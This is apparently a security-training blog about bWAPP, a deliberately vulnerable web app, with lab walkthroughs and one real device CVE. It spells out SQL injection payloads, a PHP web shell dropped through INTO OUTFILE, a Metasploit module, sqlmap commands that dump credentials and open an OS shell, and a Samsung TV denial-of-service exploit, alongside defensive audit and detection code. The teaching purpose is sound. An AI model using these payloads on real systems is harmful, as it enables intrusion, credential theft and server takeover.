Saturday, June 28, 2014

bWAPP, a buggy web application!

Web application security is today's most overlooked aspect of securing the infrastructure. These days, hackers are concentrating their efforts on our precious websites and web applications. Why? Websites and web applications are a very attractive target for cyber criminality and hacktivism because they are 24/7 available via the Internet. Mission-critical business applications, containing sensitive data, are often published on the Internet through a web interface. In addition, traditional firewalls and SSL provide no protection against web attacks, and systems engineers know little about these sophisticated application-level attacks…

It’s definitely time to improve our web security! Defense is needed… downloading and playing with bWAPP may be a first start… Wanted: superbees.

bWAPP, or a buggy web application, is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.



What makes bWAPP so unique? Well, it has over 100 web bugs! bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project.

[The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.]

Some of the vulnerabilities included in bWAPP:
  • SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
  • Blind SQL and Blind OS Command injection
  • Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
  • Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
  • Cross-Site Request Forgery (CSRF)
  • AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
  • Malicious, unrestricted file uploads and backdoor files
  • Authentication, authorization and session management issues
  • Arbitrary file access and directory traversals
  • Local and remote file inclusions (LFI/RFI)
  • Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...
  • HTTP parameter pollution and HTTP response splitting
  • Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
  • Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
  • HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
  • Unvalidated redirects and forwards, and cookie poisoning
  • Cookie poisoning and insecure cryptographic storage
  • Server Side Request Forgery (SSRF)
  • XML External Entity attacks (XXE)
  • And much much much more…

bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux, Windows and Mac with Apache/IIS and MySQL. It can also be installed with WAMP or XAMPP.
Another possibility is to download the bee-box…

The bee-box is a custom Linux Ubuntu virtual machine, pre-installed with bWAPP. It is compatible with VMware Player, Workstation, Fusion, and with Oracle VirtualBox. It requires zero installation! bee-box gives you several ways to hack and deface the bWAPP website, currently there are 10 different website defacement possibilities! It's even possible to hack the bee-box, using a local privilege escalation exploit, to get full root access… Actually, with bee-box you have the opportunity to explore, and exploit, ‘all’ bWAPP vulnerabilities! Hacking, defacing and exploiting without going to jail... how cool is that?

You can download bWAPP from here. You can download bee-box from here.

Both are part of the ‘ITSEC Games’ project. The ‘ITSEC Games’ are a fun approach to IT security education. IT security, ethical hacking, training and fun... all mixed together! Our main objectives are to teach InfoSec courses from an educational and recreational point of view.

Take a look at our ‘What is bWAPP?’ introduction guide: it includes free training materials and exercises. There is also a free cheat sheet available, containing all the bWAPP solutions…
Follow @MME_IT on Twitter, and receive this cheat sheet, updated on a regular basis, including the latest hacks and security hardening tweaks.

We also offer a 2-day exclusive comprehensive web security course: 'Attacking & Defending Web Apps with bWAPP'.
This course can be scheduled on demand, at your location.

Have fun with this free and open source project!

Cheers, Malik Mesellem, @MME_IT

bWAPP - Metasploit Modules

Hi little bees,

In this article, I'll show you how you can find an exploit in bWAPP and port it to a Metasploit module to ease the exploitation of your beloved bee-box (or any box running bWAPP).
You probably all know the Metasploit Framework. If you don't know it yet, you should absolutely take a look at its website and download/install it. If you're using Kali Linux, Metasploit is already present in your beehive.

First, we need to find a valid exploit. For now, I'll use a basic SQL injection to spawn a shell/Meterpreter session on the box.



I'm a little lazy and the basics of SQL injection are out of scope, so if you don't know how to exploit it in bWAPP you can still refer to my (killed in the beehive) bwappexploited site.

So, starting from the fact that this injection works fine to get the current database:

' and 1=0 union all select 1,2,database(),4,5,6,7 -- -

We could abuse the MySQL SELECT ... INTO OUTFILE statement to write a PHP file, our backdoor, to the webserver.
But don't forget that the file is written by the MySQL server process, so the mysql user (or a group it belongs to) needs write permission on the folder where you want to drop the backdoor.
An image or document folder is often a good choice as it is often used to upload images through an admin web interface.
In this case, the « images » folder is writable :) (http://yourip/bWAPP/images/)

Our payload could be something like this:

a' UNION SELECT 1, "<?php system($_GET['cmd']) ?>",1,1,1,1,1 INTO OUTFILE "/var/www/bWAPP/images/yabadooo.php" -- -

Of course, change the path if bWAPP is installed in another directory.
If our injection worked, a file named yabadooo.php containing our payload is present in the « images » folder; let's call it with the « id » command to see which user serves our payload.



It worked! But... you already knew that? ;)
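As an added, defender-side example (not code from this article or from the bWAPP project), the PHP script below audits the two server-side conditions the INTO OUTFILE trick depends on: the FILE privilege of the account the web application connects with, and the secure_file_priv setting. The connection parameters are placeholders.

```php
<?php
// Added example, not part of the bWAPP project or of this article.
// Audits the two server-side conditions the INTO OUTFILE trick relies on:
//   1. the application's MySQL account holds the FILE privilege
//      (directly, or through ALL PRIVILEGES ON *.*);
//   2. secure_file_priv is empty, i.e. the server may write anywhere it can.
// Connection parameters below are placeholders.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on any MySQL error

/** True when one SHOW GRANTS row hands out FILE (or ALL) at the global level. */
function grantAllowsFile(string $grant): bool
{
    // FILE is a global privilege, so only "ON *.*" grants matter.
    if (!preg_match('/^GRANT\s+(.+?)\s+ON\s+\*\.\*\s+TO/i', $grant, $m)) {
        return false;
    }
    $privs = array_map('trim', explode(',', strtoupper($m[1])));
    return in_array('ALL PRIVILEGES', $privs, true)
        || in_array('ALL', $privs, true)
        || in_array('FILE', $privs, true);
}

/** Classify secure_file_priv: NULL disables file I/O, '' allows any directory, a path confines it. */
function secureFilePrivStatus(?string $value): string
{
    if ($value === null || $value === 'NULL') {   // SHOW VARIABLES prints NULL as the text "NULL"
        return 'disabled';
    }
    if ($value === '') {
        return 'unrestricted';                     // the weak setting this trick needs
    }
    return 'restricted to ' . $value;
}

/** Check the connected account; web_root_write is true only when both conditions hold. */
function auditOutfileExposure(mysqli $db): array
{
    $hasFile = false;
    $res = $db->query('SHOW GRANTS FOR CURRENT_USER()');
    while ($row = $res->fetch_row()) {
        $hasFile = $hasFile || grantAllowsFile($row[0]);
    }
    $res = $db->query("SHOW VARIABLES LIKE 'secure_file_priv'");
    $row = $res->fetch_assoc();
    $status = secureFilePrivStatus($row['Value'] ?? null);
    return [
        'file_privilege'   => $hasFile,
        'secure_file_priv' => $status,
        // Writing into the web root needs the privilege AND no directory confinement.
        'web_root_write'   => $hasFile && $status === 'unrestricted',
    ];
}

// Placeholder credentials: use the account the web application itself connects with.
$db = new mysqli('127.0.0.1', 'bee_app', 'REPLACE_ME', 'bWAPP');
$audit = auditOutfileExposure($db);
printf("FILE privilege: %s\n", $audit['file_privilege'] ? 'yes' : 'no');
printf("secure_file_priv: %s\n", $audit['secure_file_priv']);
printf("INTO OUTFILE into the web root: %s\n", $audit['web_root_write'] ? 'POSSIBLE' : 'blocked');
```

The OS-level half of the problem (whether the mysql user can write into the images folder) cannot be checked from PHP running as the web server user; verify that with the directory permissions on the host.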

To build a Metasploit module, you have to answer this question: which steps were necessary to exploit successfully?

In our case it's rather simple:
1 – Login to bWAPP
2 – Post evil parameters to inject1.php

Here's the first step details:



As you can see, we first connect to bWAPP to store the session cookie, then we use this cookie to log in to bWAPP.

Finally, in the second step, we call the hive function to log in, then we send the evil request to get our shell.
Metasploit generates the payload for us: just replace the PHP commands in the SQL injection with « payload.encoded » and let MSF do its job.



The biggest part of the job is done; you'll understand the meaning of it all while reading, so I'll let you explore the final script.

You'll find the MSF module here; just copy/paste it into the MSF modules folder.
Kali users can drop it in /usr/share/metasploit-framework/modules/exploits/multi/http/ .
Start msfconsole and type:
> use exploit/multi/http/bwapp-sqli
> set RHOST <bWAPP IP ADDRESS>
> exploit -j

And magic happens :)

That's all bees,
Thanks for reading!

David Bloom
Twitter : @philophobia78

Sunday, December 22, 2013

bWAPP - Xmas Hacking Challenge

Hi little bees, do you get bored in the Christmas Holidays? No panic, stay tuned with us... this time we are organizing a free bWAPP Xmas Hacking Challenge. Nothing to win, just for fun (and for educational purposes of course).

bWAPP, or a buggy web application, is a deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful penetration testing and ethical hacking projects. What makes bWAPP so unique? Well, it has over 60 web bugs! bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

Are you ready to get started with our Xmas Hacking Challenge? First of all, we need YOUR public IP address. E-mail us your public IP address at bWAPP [at] itsecgames.com. Once we receive your IP, we add you on our white-list and we e-mail you back all the details. Now you are ready to roll!

Tweet your solutions, findings, and screenshots to @MME_IT #bWAPP


The first five tweeters who successfully accomplished a challenge are listed on our bWAPP Hack Hall of Fame.



[ CHALLENGE 1 ]

Bug to exploit: SQL Injection - Extracting Data


A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands (sources: OWASP).



 
Your first mission is to grab and crack Santa's password using SQL injection.
A user 'Santa Claus' was added in the bWAPP database. We need the clear text password of that user...
Tweet your solutions, findings, and screenshots to @MME_IT #bWAPP.

HINT: title='+or+1+union+select+1,2,3,4,5,6,7+--+


Hack Hall of Fame:

  1. Pen Duick, @_SaxX_
  2. Twan, @TwanSec
  3. Yaser Faraj, @yaserfaraj
  4. philophobia, @philophobia78
  5. Andy Decramer, @AndyDecramer





[ CHALLENGE 2 ]

Bug to exploit: SQL Injection - Website Defacement


Your second mission is to upload a file using SQL injection. Name the file [your_name]-sqli.htm and tweet a screenshot as proof to @MME_IT #bWAPP.

Good luck... this will probably be your first (legal) website defacement!

HINT: use an automated SQL injection tool like sqlmap. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. Pen Duick, @_SaxX_
  3. Yaser Faraj, @yaserfaraj
  4. philophobia, @philophobia78
  5. Andy Decramer, @AndyDecramer






[ CHALLENGE 3 ]

Bug to exploit: Server-Side Includes (SSI) Injection - Website Defacement


SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like: < ! # = / . " - > and [a-zA-Z0-9]

Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.

In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the web server process owner.

The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. The web server parses and executes the directives before supplying the page. Then, the attack result will be viewable the next time that the page is loaded for the user's browser (sources: OWASP).

Your third mission is to create a file using SSI injection. Name the file [your_name]-ssii.htm and tweet a screenshot as proof to @MME_IT #bWAPP. Another website defacement...


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. Pen Duick, @_SaxX_
  3. philophobia, @philophobia78
  4. Yaser Faraj, @yaserfaraj
  5. Andy Decramer, @AndyDecramer





[ CHALLENGE 4 ]

Bug to exploit: Server-Side Includes (SSI) Injection - Spawning a Shell


Your next mission is to spawn a command shell using SSI injection. Access the /etc/passwd file from the shell, and tweet a screenshot as proof to @MME_IT #bWAPP.

HINT: our firewall is blocking only incoming traffic...


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. philophobia, @philophobia78
  3. Yaser Faraj, @yaserfaraj
  4. ...
  5. ...





Saturday, August 3, 2013

Samsung TV DoS vulnerability

Recently, I discovered a DoS vulnerability on some Samsung TV devices.

The web server (DMCRUIS/0.1) on port TCP/5600 crashes when it receives a long HTTP GET request, and as a result, the TV reboots...

This was tested successfully on my Samsung PS50C7700 plasma TV.



CVE Number: CVE-2013-4890
Exploit Download Link: http://www.mmeit.be/exploits/samsungtv_reset.txt

In the demo, the TV is connected by Ethernet cable to a home network, and after running the exploit against the TV's IP address, the TV restarts a few seconds later and the process repeats.

This means that a potential attacker only needs to obtain access to the LAN that the TV has joined, in order to attack it. This can be done either by breaking into a wireless access point or by infecting a computer on the same network with malware.

Feel free to make a root exploit and to hack your Samsung TV...

Now we need firewall and antivirus protection for our televisions too :)
Samsung did not immediately return a request for comment. A shame...

Other articles related to this vulnerability:


You can follow me on Twitter: @MME_IT

Tuesday, July 16, 2013

bee-box - Hacking & Defacing bWAPP

The bee-box is a custom Linux Ubuntu virtual machine (VM), pre-installed with bWAPP.

bee-box is compatible with VMware Player, Workstation, Fusion, and with Oracle VirtualBox. It requires zero installation!

bee-box gives you several ways to hack and deface the bWAPP website, currently there are 10 different website defacement possibilities! It's even possible to hack the bee-box, using a local privilege escalation exploit, to get full root access… Actually, with bee-box you have the opportunity to explore, and exploit, ‘all’ bWAPP vulnerabilities! Hacking, defacing and exploiting without going to jail... how cool is that?

You can download bee-box from here.


These are the requirements for installing bee-box:
  • Windows, Linux or Mac OS
  • VMware Player, Workstation or Fusion

An overview of the installation steps:
  • Extract the 'rar' file.
  • Double click on the VM configuration file (bee-box.vmx), or import the VM into the VMware software.
  • Start the VM. It will login automatically.
  • Check the IP address of the VM.
  • Go to the bWAPP login page. If you browse the bWAPP root directory you will be redirected. 
    example: http://[IP]/bWAPP/
    example: http://[IP]/bWAPP/login.php
  • Login with the default bWAPP credentials, or make a new user. 
    default credentials: bee/bug
  • You are ready to explore and exploit the bee!



Some additional notes:
  • Linux credentials:
    bee/bug - root/bug
  • MySQL credentials:
    root/bug
  • Modify the Postfix settings (relayhost,...) to your environment.
    config file: /etc/postfix/main.cf
  • Take a snapshot of the VM before hacking the bee-box.
    There is also a backup of the bWAPP website (/var/www/bWAPP_BAK).
  • To reinstall the bWAPP database, delete the database with phpMyAdmin
    (http://[IP]/phpmyadmin/).
    Afterwards, browse to the following page: https://[IP]/bWAPP/install.php
  • Don't upgrade the Linux operating system, you will lose all fun :)
  • Check out SecurityTube (www.securitytube.net) for some amazing hacking videos.
    Thanks Vivek!

We also offer a 2-day comprehensive web security course 'Attacking & Defending Web Apps with bWAPP'.
This course can be scheduled on demand, at your location!




This project is part of the ITSEC Games project. ITSEC Games are a fun approach to IT security education. IT security, ethical hacking, training and fun... all mixed together.
You can find more about the ITSEC Games and bWAPP projects on our blog.

Enjoy!

Regards

Malik Mesellem
@MME_IT

Monday, January 21, 2013

bWAPP - SQL injection

Is bWAPP vulnerable to SQL injection? Yes, of course. That is the purpose of bWAPP, our extremely buggy web application. It has some nice injection issues... I made them intentionally, remember?

No... I will not explain in detail what SQL injection is!
A SQL injection attack is probably the easiest attack to prevent, while being one of the least protected against forms of attack. The core of the attack is that a SQL command is appended to the back-end query, usually through a form field in the website or web application, with the intent of breaking the original SQL statement and then running the SQL statement that was injected into the form field. I'm sure you can find enough tutorials on the Internet about SQL injection. Here's an example of a pretty nice article.

Yes... I will explain how to exploit bWAPP using SQL injection and how to take ownership of the database and even the underlying operating system. Definitely!



Currently there are 5 bugs in bWAPP related to SQL injection:
  • the Search page,
    where you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search.
  • the Select page,
    where you can select a specific movie from a drop-down list.
  • the Login page,
    where you can enter your credentials to login.
  • the Blind SQL injection page,
    where you also can search for a movie. The application will tell you if the movie exists or not. You will not see the movie details... maybe that's the reason why I called this the Blind SQL injection page :)
  • and where is bug number 5?
    A little challenge for you... somewhere in the application there is an issue with a SQL insertion. It's up to you to tell us where. Please give us your feedback @MME_IT.



The Search page

Here you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search. If you click the search button without entering any search string then all movies will be displayed.



The injection symptoms: when entering a single quote (') in the title field we receive the following message:

'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1'

I love that message!

Here we go for some basic SQL injection fun:

blah' or 1=1--

results in all the records:



blah' or 1=2--

results in 0 records:



So the URL parameter title is definitely susceptible to SQL injection:

http://localhost/bWAPP/sqli_1.php?title=blah'+or+1=1--%20&action=search
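As an added detection-side example (not code from this post or from bWAPP), here is a small PHP scanner that URL-decodes the request line of Apache combined-log entries and flags the injection patterns used on this page, starting with the title parameter probe above. The log lines are constructed for the demo: the sqli_1.php path and the query strings come from the page, the IP addresses, timestamps and sizes are made up.

```php
<?php
// Added example, not part of the bWAPP project or of this post.
// Flags Apache combined-log requests carrying the injection strings
// used on this page: quote-plus-tautology, UNION SELECT, INFORMATION_SCHEMA
// reads, INTO OUTFILE, and sqlmap's default User-Agent.

const SQLI_PATTERNS = [
    'tautology'    => '/\'\s*or\s+\d+\s*=\s*\d+/i',          // blah' or 1=1
    'union_select' => '/\bunion\s+(all\s+)?select\b/i',      // blah' union select 1,...
    'schema_probe' => '/information_schema\.(tables|columns)/i',
    'file_write'   => '/\binto\s+(out|dump)file\b/i',
    'sql_comment'  => '/--(\s|$)/',                          // trailing -- comment
];

/** Parse one combined-log line into its interesting fields; null when it does not match. */
function parseRequest(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'method' => $m[2], 'uri' => $m[3], 'status' => (int)$m[4], 'ua' => $m[5]];
}

/** Return the names of every pattern that matches the decoded query string. */
function classifyRequest(array $req): array
{
    $query = parse_url($req['uri'], PHP_URL_QUERY) ?: '';
    // urldecode() turns '+' into a space and %27 into a quote, so the
    // regexes see the same text the database server saw.
    $decoded = urldecode($query);
    $hits = [];
    foreach (SQLI_PATTERNS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    if (stripos($req['ua'], 'sqlmap') !== false) {
        $hits[] = 'sqlmap_user_agent';
    }
    return $hits;
}

/** Scan a list of lines; returns [line number => hits] for suspicious requests only. */
function scanLog(array $lines): array
{
    $report = [];
    foreach ($lines as $i => $line) {
        $req = parseRequest($line);
        if ($req === null) {
            continue;                       // skip malformed entries
        }
        $hits = classifyRequest($req);
        if ($hits !== []) {
            $report[$i + 1] = $hits;
        }
    }
    return $report;
}

// Constructed sample: a benign search, the tautology from this post, a
// UNION probe of INFORMATION_SCHEMA, and a sqlmap run against the same page.
$sample = [
    '10.0.0.5 - - [21/Jan/2013:10:00:01 +0100] "GET /bWAPP/sqli_1.php?title=iron&action=search HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [21/Jan/2013:10:00:09 +0100] "GET /bWAPP/sqli_1.php?title=blah%27+or+1=1--%20&action=search HTTP/1.1" 200 9800 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [21/Jan/2013:10:01:30 +0100] "GET /bWAPP/sqli_1.php?title=blah%27+union+select+1,table_name,1,1,1,1+from+INFORMATION_SCHEMA.TABLES+where+table_schema=database()--&action=search HTTP/1.1" 200 6100 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [21/Jan/2013:10:05:00 +0100] "GET /bWAPP/sqli_1.php?title=&action=search HTTP/1.1" 200 5000 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
];
foreach (scanLog($sample) as $n => $hits) {
    echo "line $n: " . implode(', ', $hits) . "\n";
}
```

The patterns are deliberately narrow so that ordinary titles containing a dash or the word "or" pass; widen them only with the false-positive rate of your own traffic in mind.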


What's next? Do you want to view some data not intended for you? I mean some real confidential information! Of course you do, let's go...

You could use the SQL UNION operator to append the results of your own query to those of the original statement.
First of all you need to ensure that your query returns the same number of columns as the original SQL statement when using UNION!

blah' union select 1--

results in the following message:




After a while you will discover that you should use 6 columns:

blah' union select 1,1,1,1,1,1--

results in:



And that's great!
Now we can play with the column positions and display the name of the current database:

blah' union select 1,DATABASE(),1,1,1,1--



We have found the name of the current database: bWAPP

Now our mission is to retrieve the table names of the current database:


blah' union select 1,table_name,1,1,1,1 from INFORMATION_SCHEMA.TABLES where table_schema=database()--



We have 3 tables: blog, movies and users. I think we should go for the data in the table users :)

We want to retrieve the column names for the table users:

blah' union select 1,column_name,1,1,1,1 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()--



The column names login, password, email and secret look interesting. We want those values!

blah' union select 1,login,password,email,secret,1 from users--



OK, we have the values! We exploited the underlying database by retrieving some confidential data. Apparently the password value is stored hashed and cannot be read directly. Those guys from MME are doing a great job...

After 10 seconds, 1 password was already cracked using John :p



Of course, we knew that the password for user bee was bug. I'm just trying to convince you to use complex passwords!

Let's summarize: we retrieved some data that was not intended for us. We retrieved the password hashes and we cracked a password. What's next?

Right... we will take over the database and the underlying operating system. One of my favorite tools for doing that is sqlmap.

sqlmap is an open source pentesting tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (source: sqlmap.org). It is written in Python.



We can automate the previous commands with sqlmap.

This dumps the current database version and the database names:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs




This dumps the table contents; it even cracks the passwords automatically:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump



Using sqlmap we also have the possibility to get a shell on the underlying operating system. Actually the tool will upload a web shell that runs your favorite OS commands. A very nice and powerful tool. Thank you Bernardo and Miroslav!

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --os-shell



Conclusion

SQL injection can have disastrous consequences, no doubt about it.

Feel free to test for SQL injection vulnerabilities using the bWAPP web application. As you know there are 5 different bugs related to SQL injection. You can download bWAPP from here. Don't forget to set the security level to low or medium. With security level high you will notice that SQL injection is no longer possible: at that level every user input is validated. This is done with the MySQL real escape string function and with prepared statements.
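As an added example (not bWAPP's own source), here is the shape of the Search page's vulnerable query next to the escaped and prepared-statement versions that the high security level refers to. The LIKE '%...%' form of the original query is an assumption based on the "near '%''" error shown above; the movies table and title column are from the post, the connection details are placeholders.

```php
<?php
// Added example, not bWAPP's own code. The LIKE '%...%' query shape is
// assumed from the "near '%''" error message quoted in this post.
// Requires PHP 8 with mysqli; connection parameters are placeholders.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw instead of returning false

/**
 * Vulnerable: the raw title is spliced into the SQL text, so
 *   blah' or 1=1--              closes the quote and rewrites the WHERE clause,
 *   blah' union select 1,...--  appends a second query over any table.
 */
function searchMoviesVulnerable(mysqli $db, string $title): array
{
    $sql = "SELECT * FROM movies WHERE title LIKE '%" . $title . "%'";
    return $db->query($sql)->fetch_all(MYSQLI_ASSOC);
}

/**
 * Escaping: real_escape_string() neutralises the quote (the "MySQL real escape
 * string" fix). It only protects values that sit inside quotes; an id number
 * concatenated without quotes would still be injectable, so prefer binding.
 */
function searchMoviesEscaped(mysqli $db, string $title): array
{
    $safe = $db->real_escape_string($title);
    $sql  = "SELECT * FROM movies WHERE title LIKE '%" . $safe . "%'";
    return $db->query($sql)->fetch_all(MYSQLI_ASSOC);
}

/** Build the LIKE pattern; escape % and _ so user input cannot widen the match. */
function likePattern(string $title): string
{
    return '%' . addcslashes($title, '%_\\') . '%';
}

/**
 * Prepared statement: the query text reaches MySQL first and the title travels
 * separately as a bound parameter, so it can never be parsed as SQL.
 */
function searchMoviesPrepared(mysqli $db, string $title): array
{
    $stmt    = $db->prepare('SELECT * FROM movies WHERE title LIKE ?');
    $pattern = likePattern($title);
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Request handling: never echo $db->error to the browser. The verbose
// "You have an error in your SQL syntax" text is itself the injection symptom
// this post relies on; log it server side and return a generic message.
try {
    $db   = new mysqli('127.0.0.1', 'bee_app', 'REPLACE_ME', 'bWAPP'); // placeholders
    $rows = searchMoviesPrepared($db, $_GET['title'] ?? '');
    foreach ($rows as $row) {
        echo htmlspecialchars(implode(' | ', $row), ENT_QUOTES) . "\n";
    }
} catch (mysqli_sql_exception $e) {
    error_log($e->getMessage());
    http_response_code(500);
    echo 'Search failed.';
}
```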

If you want to know more about SQL injection and tools like sqlmap, don't hesitate to subscribe for our ITSEC training. Or just invite me to your security event. It would be an honor for me to speak at your event!

Regards

Malik